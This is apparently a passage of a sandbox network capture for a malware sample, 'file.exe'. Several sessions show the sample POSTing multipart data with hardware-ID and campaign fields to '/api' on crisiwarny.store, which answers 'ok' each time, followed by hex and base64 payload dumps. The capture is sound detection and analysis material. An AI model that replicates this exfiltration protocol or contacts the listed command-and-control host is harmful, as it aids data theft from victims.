2024-10-27 12:03:02 UTC | 1007 | IN | HTTP/1.1 200 OK
    Date: Sun, 27 Oct 2024 12:03:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0d1o7cq5n9cjignicdd0u0n27s; expires=Thu, 20 Feb 2025 05:49:41 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3Bv%2BkHZPzuPrtTaL4I9BhZqtWWzq9PMB0ewtFsbDopcyetDN0wZ2GZlkDb6maITq65R05%2FKqb1UZqk6soozzRRHAPtV7MbPUgve5sAOptX3egITmbZiXMkkMeuM5WRtTjX%2F"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d928a64683b467d-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1551151&cwnd=250&unsent_bytes=0&cid=7f4ef2b48e6f1643&ts=513&x=0"
                                                                                                          Data Ascii: kTxIQ7MpQ4ZRQLWYP1fl1o1CeBxwdLCcITdFe8pI0ovTbh1QoDiThVXRo4n312CXhkH9nKPyohlzdcfr3ZnSDhAun9GwL4LHEQH3GHxV5hbNgXnfcPVwXufwhbpPC0Pcwi2YQ6Y7DgCWBfAJcVZmlMxEqdkgcyGe4GQS68lJ0M6QLd9Rs+jBwBOCth191qdUzkI7nbI2M12gNQU7m5pDzpQ8SEO9rwDHmEN2m6wRdpEdgPrO5eVwnCF2hzmJC1A
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 59 4f 6a 75 77 4a 43 67 39 65 6c 6b 6a 58 62 39 5a 38 44 45 54 34 4e 64 61 56 77 58 44 4e 69 46 50 6a 4c 53 74 48 4d 6b 36 34 64 55 54 4a 70 77 49 5a 53 77 72 66 59 76 5a 62 6b 56 67 33 41 4f 74 78 79 64 62 46 63 34 4c 66 47 36 39 67 5a 30 67 6c 43 4f 6b 35 61 39 65 6e 41 42 51 50 47 5a 68 2b 73 46 32 59 48 57 35 45 36 33 4c 4a 30 38 4e 77 6a 4e 59 62 36 69 59 6a 54 6a 74 4f 73 6e 5a 4b 78 61 30 42 46 6b 4d 49 33 47 62 78 56 70 39 53 50 51 47 6e 4e 59 2f 53 33 6a 7a 56 6b 43 4c 73 4f 44 42 66 4d 51 69 75 4e 31 65 41 71 77 4a 53 46 30 62 58 64 66 70 51 6d 6c 67 35 41 65 52 30 79 4e 6a 41 63 49 66 5a 47 2b 6b 68 4c 6c 30 2b 52 4c 39 2b 51 4d 79 69 41 78 68 4d 43 35 59 70 73 46 32 4d 48 57 35 45 79 33 7a 43 2b 38 31 77 69 70 41 4d 6f 54 64 6e 53 44 45 49 36
                                                                                                          Data Ascii: YOjuwJCg9elkjXb9Z8DET4NdaVwXDNiFPjLStHMk64dUTJpwIZSwrfYvZbkVg3AOtxydbFc4LfG69gZ0glCOk5a9enABQPGZh+sF2YHW5E63LJ08NwjNYb6iYjTjtOsnZKxa0BFkMI3GbxVp9SPQGnNY/S3jzVkCLsODBfMQiuN1eAqwJSF0bXdfpQmlg5AeR0yNjAcIfZG+khLl0+RL9+QMyiAxhMC5YpsF2MHW5Ey3zC+81wipAMoTdnSDEI6
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 61 43 51 4a 66 42 5a 52 57 35 6c 6d 43 56 6a 73 49 70 32 53 42 7a 49 5a 37 67 5a 42 4c 72 79 67 6f 52 6a 35 48 73 48 42 43 7a 61 6b 48 46 30 34 41 30 6d 33 36 57 70 4a 62 4e 77 48 74 65 4d 37 66 7a 33 75 46 31 78 44 39 62 6d 6b 50 4f 6c 44 78 49 51 37 70 71 78 77 63 58 30 62 4a 4b 65 6b 61 6b 31 46 32 58 4b 64 2f 78 64 72 43 65 34 48 57 46 75 6b 6a 4a 6b 41 38 53 4c 35 39 52 63 6d 71 44 78 39 4b 43 39 4a 31 2b 6c 47 62 55 54 38 49 36 6a 75 42 6c 63 46 6b 7a 59 68 54 33 69 4d 70 51 54 70 65 38 57 59 41 32 65 77 4a 48 67 39 65 6c 6d 62 38 56 5a 64 53 4e 51 66 6d 63 64 33 48 79 6e 57 46 31 52 2f 6b 49 43 46 64 4f 30 65 34 65 6b 33 4a 71 77 59 65 52 51 58 52 4a 37 34 61 6b 30 56 32 58 4b 64 59 32 4d 58 4c 50 4a 4b 65 43 71 38 70 4b 77 39 6c 43 4c 6c 30 52 73
                                                                                                          Data Ascii: aCQJfBZRW5lmCVjsIp2SBzIZ7gZBLrygoRj5HsHBCzakHF04A0m36WpJbNwHteM7fz3uF1xD9bmkPOlDxIQ7pqxwcX0bJKekak1F2XKd/xdrCe4HWFukjJkA8SL59RcmqDx9KC9J1+lGbUT8I6juBlcFkzYhT3iMpQTpe8WYA2ewJHg9elmb8VZdSNQfmcd3HynWF1R/kICFdO0e4ek3JqwYeRQXRJ74ak0V2XKdY2MXLPJKeCq8pKw9lCLl0Rs
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 52 67 4c 65 5a 50 42 65 6b 46 6f 7a 42 2b 74 77 79 4e 62 4a 65 49 54 65 47 75 42 75 61 51 38 36 55 50 45 68 44 75 47 33 44 52 35 43 52 73 6b 70 36 52 71 54 55 58 5a 63 70 33 66 42 30 4d 5a 32 69 39 51 57 36 53 51 69 54 7a 5a 4c 76 6e 31 49 78 4b 4d 4f 47 55 59 48 30 47 4c 36 55 5a 4a 51 4e 51 4c 68 4f 34 47 56 77 57 54 4e 69 46 50 50 4e 53 70 44 4f 67 69 75 4e 31 65 41 71 77 4a 53 46 30 62 64 61 2f 52 64 6c 46 41 31 44 4f 4a 2f 78 64 44 47 64 4a 2f 59 45 2b 67 38 4e 55 38 30 54 62 31 36 54 73 53 71 42 78 52 4d 41 70 59 70 73 46 32 4d 48 57 35 45 79 6e 66 49 2f 4d 46 6e 7a 63 39 64 39 6d 34 67 51 33 30 51 38 58 68 46 79 71 4d 44 45 55 6b 46 33 57 4c 36 57 35 4e 56 4f 78 62 6b 64 4d 44 52 78 6e 4f 4c 31 68 4c 67 4b 43 42 47 50 45 43 32 4f 51 43 41 71 78 5a
                                                                                                          Data Ascii: RgLeZPBekFozB+twyNbJeITeGuBuaQ86UPEhDuG3DR5CRskp6RqTUXZcp3fB0MZ2i9QW6SQiTzZLvn1IxKMOGUYH0GL6UZJQNQLhO4GVwWTNiFPPNSpDOgiuN1eAqwJSF0bda/RdlFA1DOJ/xdDGdJ/YE+g8NU80Tb16TsSqBxRMApYpsF2MHW5EynfI/MFnzc9d9m4gQ30Q8XhFyqMDEUkF3WL6W5NVOxbkdMDRxnOL1hLgKCBGPEC2OQCAqxZ
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 6d 44 6e 56 64 51 54 64 67 75 6e 49 2f 61 56 7a 33 75 57 77 51 58 69 50 69 41 50 41 67 62 78 59 51 36 59 37 44 73 52 51 51 6a 52 63 65 45 58 73 30 73 38 41 2f 64 38 32 4e 71 47 4d 73 33 57 55 37 64 39 61 51 38 35 57 66 45 68 48 70 4c 33 57 30 45 59 56 6f 52 34 76 6b 50 55 53 33 5a 63 74 54 57 50 78 34 59 6b 7a 5a 63 51 2f 54 77 68 54 43 74 4c 39 6b 64 77 35 37 59 44 46 46 67 58 36 46 6e 33 51 4a 6c 62 49 52 57 72 62 73 7a 62 79 48 75 62 6b 46 32 76 49 57 63 58 42 41 6a 35 4f 58 47 4f 37 42 5a 53 46 30 62 6a 5a 50 35 55 6b 30 73 6e 53 63 42 68 77 74 50 52 62 63 32 65 55 2b 6c 75 66 78 39 7a 43 4c 56 6f 44 70 6a 38 58 45 6b 61 56 59 45 33 6f 6b 58 61 52 48 59 53 70 79 4f 64 6d 34 5a 75 7a 59 68 54 71 43 30 31 58 54 74 4c 70 33 6f 4a 2f 70 49 67 46 55 6b 44
                                                                                                          Data Ascii: mDnVdQTdgunI/aVz3uWwQXiPiAPAgbxYQ6Y7DsRQQjRceEXs0s8A/d82NqGMs3WU7d9aQ85WfEhHpL3W0EYVoR4vkPUS3ZctTWPx4YkzZcQ/TwhTCtL9kdw57YDFFgX6Fn3QJlbIRWrbszbyHubkF2vIWcXBAj5OXGO7BZSF0bjZP5Uk0snScBhwtPRbc2eU+lufx9zCLVoDpj8XEkaVYE3okXaRHYSpyOdm4ZuzYhTqC01XTtLp3oJ/pIgFUkD
                                                                                                          2024-10-27 12:03:02 UTC1045INData Raw: 32 43 54 48 73 6a 36 58 7a 4f 77 39 5a 72 67 70 42 64 72 79 68 6e 46 32 38 47 38 58 31 66 67 50 52 65 51 42 52 54 68 54 43 67 43 49 73 54 4c 30 54 78 4f 35 65 48 69 44 79 66 6b 45 75 76 61 53 52 64 4c 30 36 79 62 30 32 48 6b 6a 41 31 51 51 48 58 63 65 42 4e 6d 78 49 59 4d 73 5a 46 38 63 44 46 63 6f 50 58 42 66 35 75 61 51 38 79 43 4f 6c 41 44 6f 6a 73 4d 56 77 50 48 70 59 2f 73 47 2b 58 55 7a 67 44 38 57 71 43 38 73 68 37 6a 4d 59 44 2b 43 46 6f 59 51 74 70 38 54 63 4f 78 75 78 57 51 41 46 47 30 6e 61 77 41 73 51 50 62 56 47 30 4c 4a 2b 48 32 54 4b 55 6b 41 57 76 64 6e 55 42 66 56 72 78 49 51 36 48 72 78 77 41 53 51 58 41 5a 4c 64 6b 71 6e 6f 34 41 2b 5a 74 33 39 6a 4b 58 59 37 42 47 64 45 51 4d 6b 77 7a 52 72 5a 76 58 34 44 69 54 68 30 50 58 75 38 6e 75
                                                                                                          Data Ascii: 2CTHsj6XzOw9ZrgpBdryhnF28G8X1fgPReQBRThTCgCIsTL0TxO5eHiDyfkEuvaSRdL06yb02HkjA1QQHXceBNmxIYMsZF8cDFcoPXBf5uaQ8yCOlADojsMVwPHpY/sG+XUzgD8WqC8sh7jMYD+CFoYQtp8TcOxuxWQAFG0nawAsQPbVG0LJ+H2TKUkAWvdnUBfVrxIQ6HrxwASQXAZLdkqno4A+Zt39jKXY7BGdEQMkwzRrZvX4DiTh0PXu8nu
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 31 65 64 66 0d 0a 7a 68 6e 46 32 34 47 38 57 73 4f 6d 4f 78 4a 48 45 49 48 31 57 6e 7a 53 49 5a 62 4e 52 4c 6b 50 50 48 72 34 33 47 41 31 52 33 6f 45 42 6c 75 4e 31 69 38 64 6b 6d 43 6a 41 6b 45 54 44 6a 6f 55 4f 46 64 68 42 38 51 42 2f 46 34 6a 35 75 47 5a 4d 32 49 55 38 34 6b 4e 30 49 79 54 2f 4e 5a 53 64 61 76 54 6c 77 50 41 70 59 2f 73 48 2b 5a 55 44 4d 4b 34 44 6e 75 33 39 5a 78 67 74 64 52 7a 79 6b 78 54 48 30 47 38 58 55 4f 6d 4f 77 50 47 46 38 4c 32 57 43 38 58 59 35 61 64 6b 71 6e 64 59 2b 4e 68 6e 32 48 77 42 37 67 4b 57 74 4a 4d 30 62 78 5a 67 44 5a 37 42 68 53 46 31 57 59 4a 2b 49 61 7a 42 31 78 42 2f 56 70 79 64 62 51 66 38 72 75 4c 63 49 38 49 46 38 2b 43 6f 42 30 53 74 61 35 44 51 4a 49 4f 4f 68 4b 34 6c 32 45 58 6e 51 31 38 58 6a 50 32 38
                                                                                                          Data Ascii: 1edfzhnF24G8WsOmOxJHEIH1WnzSIZbNRLkPPHr43GA1R3oEBluN1i8dkmCjAkETDjoUOFdhB8QB/F4j5uGZM2IU84kN0IyT/NZSdavTlwPApY/sH+ZUDMK4Dnu39ZxgtdRzykxTH0G8XUOmOwPGF8L2WC8XY5adkqndY+Nhn2HwB7gKWtJM0bxZgDZ7BhSF1WYJ+IazB1xB/VpydbQf8ruLcI8IF8+CoB0Sta5DQJIOOhK4l2EXnQ18XjP28


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49732        172.67.170.64   443               7472  C:\Users\user\Desktop\file.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-27 12:03:03 UTC  282                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18168
Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:03 UTC2837OUTData Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33
                                                                                                          Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
2024-10-27 12:03:04 UTC  1016               IN         HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 12:03:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6k644lrp0bgp9cu2q15vsagfj4; expires=Thu, 20 Feb 2025 05:49:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2AhvZD%2BkFjJXT%2FBQkRZgaxwNKljj%2F5kiexcR61Fu4cqd3DCzsbCKXKQIgf0KYUrm1b4VjhmJOKM0EQ4ahQMWt3px2p2t8VN9tbgdfQfzB7Wg2LFCJ%2F%2FntT63Xsmc%2BLu1zJh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d928a6ccf0de983-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=9&recv=23&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19130&delivery_rate=1782153&cwnd=247&unsent_bytes=0&cid=024d188a63b72509&ts=853&x=0"
2024-10-27 12:03:04 UTC  23                 IN         Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
Data Ascii: 11ok 173.254.250.90
2024-10-27 12:03:04 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49733        172.67.170.64   443               7472  C:\Users\user\Desktop\file.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-27 12:03:05 UTC  281                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8789
Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:05 UTC8789OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 12:03:05 UTC  1015               IN         HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 12:03:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jqtdl73fj6h57pn72ffu91f7aq; expires=Thu, 20 Feb 2025 05:49:44 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yj1zjGUvfOOghhisfUm1rglG5pE0%2FgBnXoSlRF4o15LXVtZ50YjaJnmo24Qf%2F50f%2FU0q4dsurziVrpl5%2BV%2BF38pPdElzOp%2Bxe9WcOHRomKV2kDkuAWq5NtDzaZDaiZ90X6zb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d928a767c6d478c-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9728&delivery_rate=2516072&cwnd=251&unsent_bytes=0&cid=789b1741a69d3500&ts=718&x=0"
2024-10-27 12:03:05 UTC  23                 IN         Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
Data Ascii: 11ok 173.254.250.90
2024-10-27 12:03:05 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49734        172.67.170.64   443               7472  C:\Users\user\Desktop\file.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-27 12:03:06 UTC  282                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20442
Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:06 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                                                          Data Ascii: `M?lrQMn 64F6(X&7~`
2024-10-27 12:03:07 UTC  1015               IN         HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 12:03:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fog559ld4n6ah6dmhrbagck5mb; expires=Thu, 20 Feb 2025 05:49:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mX5z827Arz625uT8hPtWlKdiEUtg9i7CW%2Fj4teB0MDQ9ZmgpX7tf8i5IzXIWNW%2FcFXykB8VTkJ2nvfmA1VA%2FSEIQ0JDl32p3GM4vQpCVUzC5%2BDd0xv1zQbbcPd2pDtwk%2BxpG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d928a7ff80e315a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1590&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21404&delivery_rate=1800995&cwnd=242&unsent_bytes=0&cid=f91c9a0866bd85a4&ts=669&x=0"
2024-10-27 12:03:07 UTC  23                 IN         Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
Data Ascii: 11ok 173.254.250.90
2024-10-27 12:03:07 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49735        172.67.170.64   443               7472  C:\Users\user\Desktop\file.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-27 12:03:08 UTC  281                OUT        POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1271
Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:08 UTC | 1271 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:09 UTC | 1007 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=bc2mpfss4e7t454t14ovtllte3; expires=Thu, 20 Feb 2025 05:49:48 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2K5r9CqaIMAUmF8dnp%2FZgbhc7W2GYfF4182MvOgFZ5Nk749i0uSWaSBfhYXFgeeHIlUyrN8cg1G%2BA8LBXX0FGGM9PbXRkpka4r06xtKfsNhTiIr7sGL2PiFobBjQGv6S9Me"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a8a2946e5b1-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
